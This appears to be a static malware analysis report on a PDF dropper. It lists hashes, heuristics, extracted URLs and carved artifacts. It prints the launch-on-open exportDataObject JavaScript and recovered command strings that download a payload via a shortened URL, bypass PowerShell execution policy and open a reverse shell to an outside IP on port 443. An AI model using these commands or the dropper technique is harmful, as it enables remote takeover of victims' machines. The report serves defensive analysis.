Malicious PDF — malware analysis report

Static analysis result for SHA-256 2f622e52539c346c…

Verdict: MALICIOUS
File type: PDF
Size: 213.9 KB
Authoring application: PyPDF2
First seen: 2021-05-22
MD5: 76eae69d12d7a3f43a0d2ff73ace4af8
SHA-1: 80d48757efa017e317543143be34e1f5f82fc4a1
SHA-256: 2f622e52539c346c1c49617081ca793bf9e4e52afa8a00eb67d6adb599966b8c
Risk Score: 272

Malware Insights

MITRE ATT&CK
  • T1059.007 JavaScript
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The PDF contains embedded JavaScript that utilizes the `exportDataObject` and `nLaunch` functions to automatically launch an embedded file named 'page.html'. This file is a Base64-encoded Windows executable payload. The script's intent is to download and execute this second-stage payload upon opening the PDF, indicating a malicious dropper.

Machine Learning

  • Nyx PDF Classifier malicious score 0.7508

Heuristics (10)

  • Base64-encoded Windows executable payload in PDF (critical, PDF_BASE64_PE_PAYLOAD)
    PDF text contains a long base64 blob that decodes to a verified Windows PE executable. This catches payloads hidden after EOF, inside comments, or in plain text outside normal PDF streams.
  • Suspicious extracted artifact (critical, EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action (low, 2 related findings, PDF_JAVASCRIPT)
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • exportDataObject + nLaunch — embedded-file launch-on-open dropper (critical, PDF_JS_EXPORT_LAUNCH_DROPPER)
    PDF JavaScript calls exportDataObject() with nLaunch set, which extracts the document's embedded file and launches it in its default application. This is a launch-on-open dropper: the embedded file is the payload. No benign workflow auto-launches an extracted PDF attachment.
  • Embedded JS stream (low, PDF_JS)
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded script payload in PDF stream (medium, PDF_EMBEDDED_SCRIPT_PAYLOAD)
    PDF stream bytes contain an HTML/XFA <script> tag without accompanying Windows shell-execution primitives — common in accessible XFA forms but worth surfacing for analyst review.
  • Embedded file (low, PDF_EMBEDDED)
    PDF embeds a file attachment, which could carry an executable or another weaponised document as a nested payload.
  • External URI (low, PDF_URI)
    PDF contains an external URL action.
  • Visual download / call-to-action button lure (low, SE_DOWNLOAD_BUTTON)
    Document contains a call-to-action phrase ('Click here to download', 'Download Now', etc.), which is low-signal unless other findings point to a malicious workflow.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • https://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js (in PDF document text)
    • https://gopoissonassets710.moipossongo.ga/static/ (in PDF document text)
    • http://www.ascendercorp.com/ (in PDF document text)
    • http://www.ascendercorp.com/typedesigners.html (in PDF document text)
    • http://www.monotype.com (Monotype) (in PDF document text)
    • https://wwwimages2.adobe.com/www.adobe.com/content/dam/acom/en/legal/licenses-terms/pdf/PlatformClients_PC_WWEULA-en_US-20150407_1357.pdf (PDF link annotation)
    • https://tinyurl.com/y88r9epk (in PDF document text)
    • http://typekit.com/eulas/000000000000000000014f51 (in PDF document text)
    • https://fedoraproject.org/wiki/Licensing/LiberationFontLicense (in PDF document text)
    • http://typekit.com/eulas/000000000000000000014f4f (in PDF document text)
    • http://www.monotype.com/html/mtname/ms_arial.html (in PDF document text)
    • http://www.monotype.com/html/mtname/ms_welcome.html (in PDF document text)
    • http://www.monotype.com/html/type/license.html (in PDF document text)

Extracted artifacts (9)

Files carved from inside the sample during analysis.

Each entry lists filename (kind), source, and size.

  • page.html (pdf-embedded-file): PDF EmbeddedFile object 46 at offset 0x1473A, 134221 bytes
    SHA-256: 6c5a1ab33514ef24d66eb658ab6bc7841cf88f4d9c96328c6c68e318a6a374b5
    Detection: ClamAV: No threats found
    Obfuscation or payload: likely
    Carved artifact contains 1 long base64-like blob(s).
  • javascript_obj0004_000.js (pdf-javascript-stream): PDF /JS object 4 at offset 0x9C7, 58 bytes
    SHA-256: 264b30b19988d0d66012af09cd2442e808d747d3fb6c4de44b81438b9bac75e3
    Script preview (first 1,000 lines of the extracted script):
      this.exportDataObject({ cName: "page.html", nLaunch: 2 });
  • javascript_obj0004_001.js (pdf-javascript-stream): PDF /JS object 4 at offset 0x9C7, 56 bytes
    SHA-256: 7138f87bffcf0462164747b9bc1008c764542af7db17de522dde7b23c4bae8f7
    Script preview (first 1,000 lines of the extracted script):
      this.exportDataObject({ cName: "page.html", nLaunch: 2 }
  • base64_pdf_pe_00014942.exe (embedded-pe): PDF raw base64 PE payload at offset 0x14942, 100235 bytes
    SHA-256: fcdf4a59fba2aff45ab3c908fb9c63f5596cb574ee186b5e120aed3feeb5ba8f
    Detection: ClamAV: No threats found
    Obfuscation or payload: likely
    actual_type=PE; declared_or_context_type=PDF; filename=base64_pdf_pe_00014942.exe; kind=embedded-pe
    Static shellcode analysis recovered URL(s): https://tinyurl.com/y88r9epk
    Static shellcode analysis recovered command string(s):
      cmd.exe /c mkdir c:\temp 2> NUL & echo ^[Net.ServicePointManager^]::SecurityProtocol ^= ^[Net.SecurityProtocolType^]::Tls12 > c:\temp\b.ps1 & echo (wget 'https://tinyu
      cmd.exe /c powershell -Execut
      cmd.exe /c powershell -ExecutionPolicy ByPass -File c:\temp\b.ps1 & START /MIN c:\temp\a.exe 76.65.106.72 443 -e cmd.exe -d & exit
  • combined_document_js_000.js (deobfuscated-js): combined document JavaScript streams at offset 0x9C7, 115 bytes
    SHA-256: 4585fe1d8b50d37587f6a44a0c0fcedebafab044930973664af49854a3626369
    Script preview (first 1,000 lines of the extracted script):
      this.exportDataObject({ cName: "page.html", nLaunch: 2 });
      this.exportDataObject({ cName: "page.html", nLaunch: 2 }
  • font_00_sfnt_off00009554.bin (pdf-font-stream): PDF embedded font (sfnt) at offset 0x9554, 8344 bytes
    SHA-256: 26f4a541ae01668596e6f0ecab6a4ec5af8e0430c526dd47363b686183eb1a36
  • font_01_sfnt_off0000ac9d.bin (pdf-font-stream): PDF embedded font (sfnt) at offset 0xAC9D, 21532 bytes
    SHA-256: 5091de8b5a8651ee3354927cb3e58ac938a47a05778b1c5b3dcda2384521acca
  • font_02_sfnt_off0000e5e7.bin (pdf-font-stream): PDF embedded font (sfnt) at offset 0xE5E7, 13036 bytes
    SHA-256: 63cf60a9e10bbfe3933cc8f3af44b00485e40612cfca4f232e82d5bbf3cb122d
  • font_03_sfnt_off000106d5.bin (pdf-font-stream): PDF embedded font (sfnt) at offset 0x106D5, 34336 bytes
    SHA-256: 434eb42b71a8798cb4ba10d418932446b08869be155f9587626055d9cb3de354